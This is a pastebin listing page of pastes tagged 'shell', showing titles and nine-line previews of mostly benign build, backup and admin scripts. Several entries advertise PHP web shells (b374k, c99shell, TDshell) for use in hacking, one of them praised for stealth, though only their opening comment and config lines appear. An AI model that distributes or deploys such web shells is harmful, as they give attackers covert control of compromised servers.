Part of Slepp's ProjectsPastebinTURLImagebinFilebin
Feedback -- English French German Japanese
Create Upload Newest Tools Donate
Sign In | Create Account

Advertising

advertising

related pastes to tag 'shell'

2096097 - b374k ver 2.011: shell version new b374k 2.011
  1. <?php
  2.  
  3. //*********************************************************************************************************************/
  4. // b374k 2.011
  5. // no malware on this code, you can check it by yourself ;-)
  6. //
  7. //
  8. // encrypt your password to md5 here http://kerinci.net/?x=decode
  9.  
2036032 - b374k shell 2.1 (source): source shell b374k 2.1
  1. <?php
  2.  
  3. // b374k 2.1
  4. // Jayalah Indonesiaku
  5.  
  6.  
  7.  
2036031 - b374k shell 2.1: shell b374k 2.1
  1. <?php
  2.  
  3. //*********************************************************************************************************************/
  4. // b374k 2.1
  5. // no malware on this code, you can check it by yourself ;-)
  6. //
  7. //
  8. // encrypt your password to md5 here http://kerinci.net/?x=decode
  9.  
2034645 - b374k ver 2.011: shell version new b374k 2.011
  1. <?php
  2.  
  3. //*********************************************************************************************************************/
  4. // b374k 2.011
  5. // no malware on this code, you can check it by yourself ;-)
  6. //
  7. //
  8. // encrypt your password to md5 here http://kerinci.net/?x=decode
  9.  
2034644 - b374k ver 2.011: shell version new b374k 2.011
  1. <?php
  2.  
  3. //*********************************************************************************************************************/
  4. // b374k 2.011
  5. // no malware on this code, you can check it by yourself ;-)
  6. //
  7. //
  8. // encrypt your password to md5 here http://kerinci.net/?x=decode
  9.  
1948420 - charlyx: script shell flex install mac sdk
  1. #!/bin/sh
  2.  
  3. URI=http://fpdownload.adobe.com/pub/flex/sdk/builds/flex4
  4. ZIPFILE=flex_sdk_4.1.0.16076.zip
  5. DEST=$HOME/FlexSDK
  6. SHCONFIG=$HOME/.bash_profile
  7.  
  8. if [ -d $DEST ]; then
  9.  
1917250 - myShell: php shell
  1. <?php
  2. error_reporting(0); //If there is an error, we'll show it, k?
  3. $password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
  4. $me = basename(__FILE__);
  5. $cookiename = "wieeeee";
  6.  
  7. if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
  8. {
  9.  
1788198 - springlobby: shell compile springlobby
  1. #!/bin/sh
  2. #
  3. # Slackware build script for SpringLobby
  4. #
  5. # Copyright 2009  Erik W. Hanson, Minneapolis, MN, USA
  6. # All rights reserved.
  7. #
  8. # Redistribution and use of this script, with or without modification, is
  9.  
1760430 - adjusting Root entries on cvs pr: shell bug cvs
  1. for i in $(find . | grep CVS\/Root); do echo ":pserver:teste@172.16.0.26:/home/cvs/cvsroot" > $i ; done
1714193 - Set-up tutorial: linux irc shell tutorial unrealircd unix srsv
  1. Setting up UnrealIRCd on a *Nix based shell. this uses Unreal3.2.8.1 as an example.
  2.  
  3. •     SSH to Your shell
  4. •     Put in your username and password
  5. •     wget http://unreal.brueggisite.de/Unreal3.2.8.1.tar.gz
  6. •     tar zxvf Unreal3.2.8.1.tar.gz
  7. •     cd Unreal3.2
  8. •     ./Config
  9.  
1657983 - drop: shell bash dropbox
  1. #!/bin/sh
  2.  
  3. # No args, copy the current directory to your dropbox
  4. if [[ x"$1" = x ]]; then
  5.     cp -R . ~/Dropbox/${PWD##*/}
  6.  
  7. # Copy all given filenames to your dropbox
  8. else
  9.  
1595110 - Anonymous: shell bash
  1. leonardo@zylle:~$ cat /etc/profile
  2. # /etc/profile: This file contains system-wide defaults used by
  3. # all Bourne (and related) shells.
  4.  
  5. # Set the values for some environment variables:
  6. export MINICOM="-c on"
  7. export MANPATH=/usr/local/man:/usr/man
  8. export HOSTNAME="`cat /etc/HOSTNAME`"
  9.  
1557911 - shlog.c: linux log shell security syslog
  1. /*
  2. * shlog.c (c) Mixter
  3. * FIXED Version (thanks to scagneti@chisel.toolcity.net)
  4. * Well, this does not too much.. it will determine the
  5. * origin (remote IP address) from which a shell is launched (user
  6. * id/remote host), and write a syslog entry, everytime a login shell
  7. * is invoked. This can help against login trojans, or just for providing
  8. * better audit trails.
  9.  
  10.  
1529276 - MyShell v0.1 alpha: php mantis shell dark
  1. <?php
  2.  
  3. /*
  4.  
  5.  
  6. ##############################################################################
  7. ##############################################################################
  8.  
  9.  
1510407 - sshd daemon watcher: linux script shell bash monitor sshd
  1. #!/bin/bash
  2. declare SSHD_PID="/var/run/sshd.pid"
  3. declare SSHD_SERVICE="/etc/rc.d/rc.sshd"
  4. # for debugging...
  5. # SSHD_SERVICE="echo"
  6. declare SSHD_RESTART="${SSHD_SERVICE} restart"
  7. declare SSHD_STOP="${SSHD_SERVICE} stop"
  8. declare SSHD_START="${SSHD_SERVICE} start"
  9.  
1510402 - sshd daemon watcher: linux script shell bash monitor sshd
  1. #!/bin/bash
  2. declare SSHD_PID="/var/run/sshd.pid"
  3. declare SSHD_SERVICE="/etc/rc.d/rc.sshd"
  4. # for debugging...
  5. # SSHD_SERVICE="echo"
  6. declare SSHD_RESTART="${SSHD_SERVICE} restart"
  7. declare SSHD_STOP="${SSHD_SERVICE} stop"
  8. declare SSHD_START="${SSHD_SERVICE} start"
  9.  
1494917 - Batch upgrade script for multipl: shell wordpress wpmu
  1. #!/bin/bash
  2.  
  3. # Change the following variable to your own path.
  4. # Assumes all wp installs within the following directory are
  5. # svn checkouts from http://svn.automattic.com/wordpress
  6. BASE_PATH="/path/to/the/directory/containing/all/your/wp/installs"
  7.  
  8. # Automattic SVN repos (uncomment the one you want, wp or wpmu)
  9.  
1395059 - Batch upgrade script for multipl: shell wordpress wpmu
  1. #!/bin/bash
  2.  
  3. # Change the following variable to your own path.
  4. # Assumes all wp installs within the following directory are
  5. # svn checkouts from http://svn.automattic.com/wordpress
  6. BASE_PATH="/path/to/the/directory/containing/all/your/wp/installs"
  7.  
  8. # Automattic SVN repos (uncomment the one you want, wp or wpmu)
  9.  
1278936 - wikify-pca-l.sh: shell perl regexp pca
  1. #! /bin/sh
  2.  
  3. perl -p -e '
  4.   s,(\d{6}-\d\d),[http://sunsolve.sun.com/search/document.do?assetkey=$1 $1]<ref name="Sun Solaris Patch $1">[http://sunsolve.sun.com/search/document.do?assetkey=$1 http://sunsolve.sun.com/search/document.do?assetkey=$1 → Sun Solaris Patch $1]</ref>,g ;
  5.   s,(\d{6})\s,[http://sunsolve.sun.com/search/document.do?assetkey=$1 $1]<ref name="Sun Solaris Patch $1">[http://sunsolve.sun.com/search/document.do?assetkey=$1 http://sunsolve.sun.com/search/document.do?assetkey=$1 → Sun Solaris Patch $1]</ref>,g ;
  6.   s,^, ,
  7. '
  8.  
  9.  
1278934 - wikify-pca-l.sh: shell perl regexp pca
  1. #! /bin/sh
  2.  
  3. perl -p -e 's,(\d{6}-\d\d),[http://sunsolve.sun.com/search/document.do?assetkey=$1 $1]<ref name="Sun Solaris Patch $1">[http://sunsolve.sun.com/search/document.do?assetkey=$1 http://sunsolve.sun.com/search/document.do?assetkey=$1 → Sun Solaris Patch $1]</ref>,g ; s,(\d{6})\s,[http://sunsolve.sun.com/search/document.do?assetkey=$1 $1]<ref name="Sun Solaris Patch $1">[http://sunsolve.sun.com/search/document.do?assetkey=$1 http://sunsolve.sun.com/search/document.do?assetkey=$1 → Sun Solaris Patch $1]</ref>,g ; s,^, ,'
  4.  
  5. # EOF #
1222759 - SQL-BashScript: menu sql script shell bash execution
  1. #!/bin/bash
  2. #
  3. # SQL Shell Execution Menu Bash Script
  4. #
  5. # by Mike Jans mailto: infos[At]bash[DoT]ch
  6. #
  7. ############################################
  8.  
  9.  
969064 - poormanmap: script shell ping nmap
  1. a=0; while [ $a -lt 255 ]
  2. do
  3.   b=0; while [ $b -lt 255 ]
  4.   do
  5.     echo sweeping through 10.$a.$b.*
  6.     c=0; while [ $c -lt 255 ]
  7.     do
  8.       c=`echo $c+1 | bc`
  9.  
962183 - c99 shell: shell
  1. <?php
  2. #--Config--#
  3. $login_password= ''; //Set password
  4. #----------#
  5. ini_set("max_execution_time","0");
  6. ini_set("memory_limit","9999M");
  7.  
921903 - c99 shell: shell
  1. <?php
  2. #--Config--#
  3. $login_password= ''; //Set password
  4. #----------#
  5. ini_set("max_execution_time","0");
  6. ini_set("memory_limit","9999M");
  7.  
875967 - baaba: shell lame scr
  1. $ cat ~/bin/wav2mp3
  2. #!/bin/bash
  3. if [ $# -ne 1 ]
  4.         then
  5.         RATE=128
  6.         else
  7.         RATE=$1
  8. fi
  9.  
859645 - SCP FRONTEND 1: script shell scp nautilus
  1. #!/bin/sh
  2. # SCP front-end script
  3. # Created by Rafael C. Brandão (rcbrandao@gmail.com)
  4.  
  5. # First, select the file...
  6. com1=`zenity --file-selection --title="Select the file"`
  7.   if [ -n "$com1" ]
  8.     then
  9.  
838117 - [TDshell] v0.1 Beta: shell thedefaced td tdshell
  1. I've come to alert you all, and demonstrate the history of PHP Shells.
  2.  
  3. We have all come across them, and most of us have used them. They are nothing but a benefit for us during hacking, file management, or security. You must all know of c99, w4ck1ng (of course), and the others. This is another shell, but is it?
  4.  
  5. Inspired once more by how, for example storm7shell was just another edit of c99. After all, they'll all based off of the c99.
  6.  
  7. So, what makes these shells... good? Features, usability, and speed. To cut to the chase, TDshell will do all of that, and add another element. Stealth.
  8.  
  9.  
829429 - php shell: php shell
  1. <?php
  2. /*
  3. ******************************************************************************************************
  4. *
  5. *                                   c99shell.php v.1.0 pre-release build #16
  6. *                                                 Freeware license.
  7. *                                                        � CCTeaM.
  8. *  c99shell - ����-�������� ����� www-�������.
  9.  
  10.  
829426 - php shell: php shell
  1. Hello and welcome to c99.php shell.
  2. Ill post the newest c99 shell down here:
  3.  
  4. <?php
  5. /*
  6. ******************************************************************************************************
  7. *
  8. *                                   c99shell.php v.1.0 pre-release build #12
  9.  
  10.  
815719 - shell scopes sh shell bash loop while
preview unavailable
759628 - leleobhz: linux shell rescue chroot
  1. #!/bin/bash
  2.  
  3. HDROOT="/dev/hdc1"
  4. WHEREMOUNT="/media/linuxroot"
  5.  
  6. sudo mkdir $WHEREMOUNT
  7. sudo mount -o rw,sync $HDROOT $WHEREMOUNT
  8. sudo mount -o bind /proc $WHEREMOUNT/proc
  9.  
700390 - /.backup/start_backup script shell unix backup
preview unavailable
679190 - php shell: php shell
  1. <?php
  2. /*
  3. ****************************************************************
  4. *                                                                                       
  5. *              c99shell.php v.2.0 beta ( 21.07.2007)   
  6. *                                                                       
  7. *                        © Beyrut-KaI3uS                           
  8. ****************************************************************
  9.  
678123 - fris: shell video media ffmpeg
  1. #!/bin/sh
  2.  
  3. # make life easier 1.0
  4. # script to convert, split and create thumbs for videos
  5. # chris <chris@lod.com>
  6.  
  7. case "$1" in
  8. thumbs)
  9.  
661639 - C99.php shell: php shell c99
  1. Hello and welcome to c99.php shell.
  2. Ill post the newest c99 shell down here:
  3.  
  4. <?php
  5. /*
  6. ******************************************************************************************************
  7. *
  8. *                                   c99shell.php v.1.0 pre-release build #12
  9.  
661591 - php shell: php shell
  1. Hello and welcome to c99.php shell.
  2. Ill post the newest c99 shell down here:
  3.  
  4. <?php
  5. /*
  6. ******************************************************************************************************
  7. *
  8. *                                   c99shell.php v.1.0 pre-release build #12
  9.  
655481 - C99.php shell: php shell c99
  1. Hello and welcome to c99.php shell.
  2. Ill post the newest c99 shell down here:
  3.  
  4. <?php
  5. /*
  6. ******************************************************************************************************
  7. *
  8. *                                   c99shell.php v.1.0 pre-release build #12
  9.  
610412 - live autoinstall script linux grml shell
preview unavailable
worth-right